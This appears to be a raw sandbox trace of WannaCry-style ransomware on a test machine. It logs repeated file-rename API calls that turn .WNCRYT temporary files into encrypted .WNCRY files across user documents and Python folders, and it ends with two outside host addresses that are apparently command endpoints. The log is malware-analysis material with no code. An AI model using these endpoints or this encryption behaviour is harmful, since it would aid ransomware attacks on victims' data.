newfilepath_r: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\FOwRatdvSt.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\FOwRatdvSt.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\FOwRatdvSt.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\FOwRatdvSt.docm.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\gQkWZLHqeA.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\gQkWZLHqeA.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\gQkWZLHqeA.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\gQkWZLHqeA.docm.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\sByekmDWYN.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\sByekmDWYN.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\sByekmDWYN.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\sByekmDWYN.docm.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\readme.bmp.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.bmp.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.bmp.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.bmp.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\readme.c.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.c.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.c.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.c.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\readme.cpp.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.cpp.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.cpp.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.cpp.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\readme.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.doc.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\readme.hwp.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.hwp.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.hwp.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.hwp.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\readme.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\readme.xls.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.xls.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.xls.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.xls.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\log.txt.WNCRY
flags: 2
oldfilepath_r: C:\log.txt.WNCRYT
newfilepath: C:\log.txt.WNCRY
oldfilepath: C:\log.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Python27\LICENSE.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\LICENSE.txt.WNCRYT
newfilepath: C:\Python27\LICENSE.txt.WNCRY
oldfilepath: C:\Python27\LICENSE.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Python27\NEWS.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\NEWS.txt.WNCRYT
newfilepath: C:\Python27\NEWS.txt.WNCRY
oldfilepath: C:\Python27\NEWS.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Python27\README.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\README.txt.WNCRYT
newfilepath: C:\Python27\README.txt.WNCRY
oldfilepath: C:\Python27\README.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Python27\Lib\email\test\data\msg_02.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_02.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_02.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_02.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Python27\Lib\email\test\data\msg_06.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_06.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_06.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_06.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Python27\Lib\email\test\data\msg_07.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_07.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_07.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_07.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Python27\Lib\email\test\data\msg_13.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_13.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_13.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_13.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Python27\Lib\email\test\data\msg_15.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_15.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_15.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_15.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Python27\Lib\email\test\data\msg_16.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_16.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_16.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_16.txt.WNCRYT
1 1 0
Time & API Arguments Status Return Repeated

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Desktop\readme.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Desktop\readme.txt.WNCRYT
newfilepath: C:\Users\test22\Desktop\readme.txt.WNCRY
oldfilepath: C:\Users\test22\Desktop\readme.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRYT
newfilepath: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRY
oldfilepath: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\cNwCMkjaYf.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\cNwCMkjaYf.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\cNwCMkjaYf.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\cNwCMkjaYf.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\eMPyMLlGiYRCx.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\eMPyMLlGiYRCx.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\eMPyMLlGiYRCx.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\eMPyMLlGiYRCx.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\FSRTltbNCjG.docx.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\FSRTltbNCjG.docx.WNCRYT
newfilepath: C:\Users\test22\Documents\FSRTltbNCjG.docx.WNCRY
oldfilepath: C:\Users\test22\Documents\FSRTltbNCjG.docx.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\jrRNInQJEzypfU.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\jrRNInQJEzypfU.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\jrRNInQJEzypfU.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\jrRNInQJEzypfU.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\jsGIrPlHsPM.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\jsGIrPlHsPM.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\jsGIrPlHsPM.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\jsGIrPlHsPM.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\KIprYLexEf.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\KIprYLexEf.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\KIprYLexEf.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\KIprYLexEf.doc.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\mITOpbdqvUil.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\mITOpbdqvUil.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\mITOpbdqvUil.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\mITOpbdqvUil.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\NMsibqicnH.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\NMsibqicnH.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\NMsibqicnH.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\NMsibqicnH.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\ONyeiyAHXnG.docx.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\ONyeiyAHXnG.docx.WNCRYT
newfilepath: C:\Users\test22\Documents\ONyeiyAHXnG.docx.WNCRY
oldfilepath: C:\Users\test22\Documents\ONyeiyAHXnG.docx.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\qiBMgZOnGFjI.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\qiBMgZOnGFjI.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\qiBMgZOnGFjI.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\qiBMgZOnGFjI.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\tLwQFCBpzg.ppt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\tLwQFCBpzg.ppt.WNCRYT
newfilepath: C:\Users\test22\Documents\tLwQFCBpzg.ppt.WNCRY
oldfilepath: C:\Users\test22\Documents\tLwQFCBpzg.ppt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\vSjjFAKhemtn.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\vSjjFAKhemtn.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\vSjjFAKhemtn.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\vSjjFAKhemtn.doc.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\VyTyVAoqvtpE.docx.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\VyTyVAoqvtpE.docx.WNCRYT
newfilepath: C:\Users\test22\Documents\VyTyVAoqvtpE.docx.WNCRY
oldfilepath: C:\Users\test22\Documents\VyTyVAoqvtpE.docx.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\WmXfDlmbAt.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\WmXfDlmbAt.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\WmXfDlmbAt.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\WmXfDlmbAt.doc.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\XdyTjZxlaDDcWzshC.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\XdyTjZxlaDDcWzshC.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\XdyTjZxlaDDcWzshC.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\XdyTjZxlaDDcWzshC.txt.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\FOwRatdvSt.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\FOwRatdvSt.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\FOwRatdvSt.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\FOwRatdvSt.docm.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\gQkWZLHqeA.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\gQkWZLHqeA.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\gQkWZLHqeA.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\gQkWZLHqeA.docm.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\sByekmDWYN.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\sByekmDWYN.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\sByekmDWYN.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\sByekmDWYN.docm.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\readme.bmp.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.bmp.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.bmp.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.bmp.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\readme.c.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.c.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.c.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.c.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\readme.cpp.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.cpp.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.cpp.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.cpp.WNCRYT
1 1 0

MoveFileWithProgressW

newfilepath_r: C:\Users\test22\Documents\readme.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.doc.WNCRYT
1 1 0

dead_host 163.172.13.165:9001
dead_host 81.7.10.93:31337